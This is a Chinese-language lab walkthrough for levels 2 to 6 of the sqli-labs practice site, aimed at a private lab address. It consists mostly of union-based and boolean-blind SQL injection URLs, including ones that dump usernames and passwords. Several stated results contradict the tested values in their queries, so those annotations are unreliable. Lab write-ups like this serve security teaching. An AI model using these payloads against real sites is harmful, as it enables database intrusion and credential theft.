文章目录
前言
由于SQL闯关中的2-4关思路和想法基本上与SQL的第1关相似,而SQL闯关中的5-6关思路和想法基本上与SQL的第8关相似,这里笔者只是将用到的URL地址写在了下面,因为套路一样就不过多赘述。要是读者遇见自己看不懂的地方可以参考我之前发的SQL闯关系列文章进行学习。最后希望能给读者带来好的阅读体验。
一、sql数据库结构
首先对SQL数据库进行注入时,要了解一下sql的数据库结构。sql数据库主要是1库3表6字段。
1库是information_schema
3表是schemas、tables、columns
6字段分别是schemas下面的schema_name。tables下面的table_name、table_schema。columns下面的table_name、table_schema、column_name
当熟悉上面sql数据库中的1库3表6字段之后,理解下面的代码就简单了不少
二、sql第2关代码
http://192.168.182.30/sql/Less-2/?id=1'
http://192.168.182.30/sql/Less-2/?id=1 and 1=1
http://192.168.182.30/sql/Less-2/?id=1 and 1=2判断出是数值型sql注入
http://192.168.182.30/sql/Less-2/?id=1 order by 3%23
http://192.168.182.30/sql/Less-2/?id=1 order by 4%23判断出有三个字段
http://192.168.182.30/sql/Less-2/?id=-1 union select 1,2,3
http://192.168.182.30/sql/Less-2/?id=-1 union select 1,database(),version()
http://192.168.182.30/sql/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'这个第二关不需要加注释#
http://192.168.182.30/sql/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'
http://192.168.182.30/sql/Less-2/?id=-1 union select 1,2,group_concat(username,0x3a,password) from security.users
三、sql第3关代码
http://192.168.182.30/sql/Less-3/?id=1')%23
http://192.168.182.30/sql/Less-3/?id=1') and 1=1%23
http://192.168.182.30/sql/Less-3/?id=1') and 1=2%23判断出是字符型
http://192.168.182.30/sql/Less-3/?id=1') order by 3%23
http://192.168.182.30/sql/Less-3/?id=1') order by 4%23判断出是3个字段
http://192.168.182.30/sql/Less-3/?id=-1') union select 1,2,3%23
http://192.168.182.30/sql/Less-3/?id=-1') union select 1,database(),version()%23
http://192.168.182.30/sql/Less-3/?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'%23
http://192.168.182.30/sql/Less-3/?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'%23
http://192.168.182.30/sql/Less-3/?id=-1') union select 1,2,group_concat(username,0x3a,password) from users%23
四、sql第4关代码
http://192.168.182.30/sql/Less-4/?id=1")%23
http://192.168.182.30/sql/Less-4/?id=1") and 1=1%23
http://192.168.182.30/sql/Less-4/?id=1") and 1=2%23判断出是字符型
http://192.168.182.30/sql/Less-4/?id=1") order by 3%23
http://192.168.182.30/sql/Less-4/?id=1") order by 4%23
http://192.168.182.30/sql/Less-4/?id=-1") union select 1,2,3%23
http://192.168.182.30/sql/Less-4/?id=-1") union select 1,database(),version()%23
http://192.168.182.30/sql/Less-4/?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'%23
http://192.168.182.30/sql/Less-4/?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'%23
http://192.168.182.30/sql/Less-4/?id=-1") union select 1,2,group_concat(username,0x3a,password) from users%23
五、sql第5关代码
http://192.168.182.30/sql/Less-5/?id=1' and length(database())=1%23判断出库的字符有8个
http://192.168.182.30/sql/Less-5/?id=1' and substr(database(),1,1)='t'%23判断出库的首字母是s
http://192.168.182.30/sql/Less-5/?id=1' and substr(database(),1,1)='t'%23集束炸弹显示库的名字为security
http://192.168.182.30/sql/Less-5/?id=1' and (select count(table_name) from information_schema.tables where table_schema=database())=5%23判断出库中共有5个表
http://192.168.182.30/sql/Less-5/?id=1' and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=6%23判断出表名的长度为6
http://192.168.182.30/sql/Less-5/?id=1' and substr((select table_name from information_schema.tables where table_schema='security' limit 1,1),1,1) ='r'%23判断出表名为emails
http://192.168.182.30/sql/Less-5/?id=1' and (select count(column_name) from information_schema.columns where table_schema=database() and table_name = 'users')=3%23
判断出users表中字段数为3
http://192.168.182.30/sql/Less-5/?id=1' and substr((select username from users limit 0,1),1,1)='D'%23
http://192.168.182.30/sql/Less-5/?id=1' and substr((select column_name from information_schema.columns where table_schema='security' limit 0,1),1,1)='e'%23判断出字段名为id
六、sql第6关代码
http://192.168.182.30/sql/Less-6/?id=1"
http://192.168.182.30/sql/Less-6/?id=1" and 1=1%23
http://192.168.182.30/sql/Less-6/?id=1" and 1=2%23判断出是字符型
http://192.168.182.30/sql/Less-6/?id=1" and length(database())=1%23判断出库的字符长度为8个
http://192.168.182.30/sql/Less-6/?id=1" and substr(database(),1,1)='s'%23判断库的首字母是s
http://192.168.182.30/sql/Less-6/?id=1" and substr(database(),1,1)='s'%23判断出库的名security
http://192.168.182.30/sql/Less-6/?id=1" and (select count(table_name) from information_schema.tables where table_schema=database())=5%23判断出共有5个表
http://192.168.182.30/sql/Less-6/?id=1" and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=1%23表的字符长度为6
http://192.168.182.30/sql/Less-6/?id=1" and substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)='e'%23
http://192.168.182.30/sql/Less-6/?id=1" and (select count(column_name) from information_schema.columns where table_schema=database() and table_name='emails')=4%23判断出emails表中有2个字段
http://192.168.182.30/sql/Less-6/?id=1" and length((select column_name from information_schema.columns where table_schema=database() limit 0, 1))=4%23判断出字段字符长度为2
http://192.168.182.30/sql/Less-6/?id=1" and substr((select column_name from information_schema.columns where table_schema=database() limit 0, 1),1,1)='e'%23判断出字段为id
总结
以上URL地址中的代码仅仅只是列举了我们想要得到的一小部分。如果我们想要得到其他的表和字段的内容仅仅只需要改对应的参数就可以。当然对于5-6关而言需要我们借助Burpsuite来进行辅助抓包和爆破。如果读者有不理解的地方可以参考我之前发表的文章SQL闯关第一关和SQL闯关第八关来结合着看一起学习,效果会更加好。